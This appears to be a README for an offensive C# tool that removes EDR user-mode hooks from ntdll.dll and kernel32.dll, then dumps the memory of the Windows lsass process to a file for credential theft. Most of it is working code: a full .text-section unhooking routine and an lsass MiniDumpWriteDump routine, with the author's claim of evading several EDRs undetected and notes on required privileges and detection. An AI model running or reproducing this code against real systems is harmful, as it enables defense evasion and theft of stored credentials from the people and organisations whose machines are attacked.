Little program written in C# to bypass EDR hooks and dump the content of the lsass process. The code makes use of SharpUnhooker.
The SharpUnhooker project, created by GetRektBoy724, works the following way:
- It reads and copies the `.text` section of the original (on-disk) DLL using "PE parser stuff".
- It patches the `.text` section of the loaded DLL using `Marshal.Copy` and `NtProtectVirtualMemory` from D/Invoke (to change the permissions of the memory).
- It checks the patched in-memory DLL by reading it again and comparing it with the original one to see whether it was correctly patched.
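The three steps above written out in plain C#, as an added example that is not SharpUnhooker's code and not part of this program: it parses the on-disk PE headers to find `.text`, compares the loaded section against the file bytes, overwrites it, and reads it back to verify. It assumes a 64-bit process (x64 `.text` sections of ntdll/kernel32 contain no relocations, so clean in-memory bytes equal the file bytes) and uses kernel32's `VirtualProtect` through P/Invoke where SharpUnhooker uses D/Invoke's `NtProtectVirtualMemory`; the class name `TextSectionRestorer` and the method names are mine.

```csharp
using System;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;

// Added example, not SharpUnhooker's code: restore a loaded DLL's .text section from the
// on-disk image. Assumes a 64-bit process (x64 .text has no relocations, so the file bytes
// and the clean in-memory bytes are identical) and uses P/Invoke VirtualProtect where
// SharpUnhooker uses D/Invoke NtProtectVirtualMemory.
static class TextSectionRestorer
{
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    const uint PAGE_EXECUTE_READWRITE = 0x40;

    // Step 1: walk the PE headers of the on-disk image to the .text section header.
    static bool FindTextSection(byte[] image, out int rva, out int rawOffset, out int size)
    {
        rva = rawOffset = size = 0;
        int nt = BitConverter.ToInt32(image, 0x3C);                       // IMAGE_DOS_HEADER.e_lfanew
        if (BitConverter.ToUInt32(image, nt) != 0x00004550) return false; // "PE\0\0"
        int numberOfSections = BitConverter.ToUInt16(image, nt + 6);      // IMAGE_FILE_HEADER.NumberOfSections
        int sizeOfOptionalHeader = BitConverter.ToUInt16(image, nt + 20); // IMAGE_FILE_HEADER.SizeOfOptionalHeader
        int section = nt + 24 + sizeOfOptionalHeader;                     // first IMAGE_SECTION_HEADER (40 bytes each)
        for (int i = 0; i < numberOfSections; i++, section += 40)
        {
            if (Encoding.ASCII.GetString(image, section, 8).TrimEnd('\0') != ".text") continue;
            int virtualSize = BitConverter.ToInt32(image, section + 8);   // Misc.VirtualSize
            rva = BitConverter.ToInt32(image, section + 12);              // VirtualAddress
            int sizeOfRawData = BitConverter.ToInt32(image, section + 16);
            rawOffset = BitConverter.ToInt32(image, section + 20);        // PointerToRawData
            size = Math.Min(virtualSize, sizeOfRawData);                  // bytes present both on disk and in memory
            return true;
        }
        return false;
    }

    // Returns how many bytes of the loaded .text differed from disk before patching
    // (0: nothing was hooked, so nothing was written), or -1 on parse/protect/verify failure.
    public static int Restore(string dllName)
    {
        byte[] disk = File.ReadAllBytes(Path.Combine(Environment.SystemDirectory, dllName));
        if (!FindTextSection(disk, out int rva, out int rawOffset, out int size)) return -1;

        IntPtr moduleBase = GetModuleHandle(dllName);
        if (moduleBase == IntPtr.Zero) return -1;
        IntPtr text = moduleBase + rva;

        // Read the loaded section and count bytes that differ from disk; an inline hook is
        // typically a jmp written over the first bytes of an exported function.
        byte[] memory = new byte[size];
        Marshal.Copy(text, memory, 0, size);
        int differing = memory.Where((b, i) => b != disk[rawOffset + i]).Count();
        if (differing == 0) return 0;

        // Step 2: make the section writable, copy the clean bytes over it, restore the old protection.
        if (!VirtualProtect(text, (UIntPtr)(uint)size, PAGE_EXECUTE_READWRITE, out uint oldProtect)) return -1;
        Marshal.Copy(disk, rawOffset, text, size);
        VirtualProtect(text, (UIntPtr)(uint)size, oldProtect, out _);

        // Step 3: read the section back and confirm it now matches the on-disk bytes.
        Marshal.Copy(text, memory, 0, size);
        bool verified = memory.SequenceEqual(new ArraySegment<byte>(disk, rawOffset, size));
        return verified ? differing : -1;
    }

    static void Main()
    {
        foreach (string dll in new[] { "ntdll.dll", "kernel32.dll" })
            Console.WriteLine($"{dll}: {Restore(dll)} differing byte(s) restored");
    }
}
```

Two caveats for anyone adapting this: in a 32-bit process the loader applies relocations inside `.text`, so the byte comparison would report them as hooks and the copy would clobber them, which is why the example assumes x64; and the transient RWX protection change plus the `VirtualProtect` call itself are visible to a hook placed on `VirtualProtect` or to a kernel-side monitor, which is the reason SharpUnhooker reaches `NtProtectVirtualMemory` through D/Invoke instead.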
By just using SharpUnhooker and the MiniDumpWriteDump function, I was able to bypass multiple EDRs and managed to dump the content of lsass without being detected. This is the code that does the trick:
```csharp
using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
// Overwrite the loaded .text of ntdll.dll and kernel32.dll with the on-disk bytes, removing
// user-mode inline hooks (SilentUnhooker is SharpUnhooker's entry point).
SilentUnhooker("ntdll.dll");
SilentUnhooker("kernel32.dll");
String dumpFileName = Directory.GetCurrentDirectory() + "\\" + "lsass.dmp";
if (File.Exists(dumpFileName))
{
    File.Delete(dumpFileName);
}
// CreateFile/MiniDumpWriteDump are P/Invoke declarations in NativeMethods; hFile should be closed with CloseHandle afterwards.
IntPtr hFile = NativeMethods.CreateFile(dumpFileName, NativeMethods.EFileAccess.GenericWrite, NativeMethods.EFileShare.None, lpSecurityAttributes: IntPtr.Zero, dwCreationDisposition: NativeMethods.ECreationDisposition.CreateAlways, dwFlagsAndAttributes: NativeMethods.EFileAttributes.Normal, hTemplateFile: IntPtr.Zero);
NativeMethods._MINIDUMP_TYPE dumpType = NativeMethods._MINIDUMP_TYPE.MiniDumpWithFullMemory;
// Process.Handle opens lsass with PROCESS_ALL_ACCESS: run elevated with SeDebugPrivilege
// (Process.EnterDebugMode() enables it); it fails when lsass is a protected process (RunAsPPL).
// Unhooking does not hide this handle open from kernel callbacks or Sysmon event 10.
var proc = Process.GetProcessesByName("lsass").FirstOrDefault();
if (proc == null)
{
    Console.WriteLine("lsass process not found");
    return;
}
var exceptInfo = new NativeMethods.MINIDUMP_EXCEPTION_INFORMATION();
var result = NativeMethods.MiniDumpWriteDump(proc.Handle, proc.Id, hFile, dumpType, ref exceptInfo, UserStreamParam: IntPtr.Zero, CallbackParam: IntPtr.Zero);
if (result)
{
    Console.WriteLine("lsass process was successfully dumped in " + dumpFileName);
}
else
{
    Console.WriteLine("Error dumping lsass process");
}
```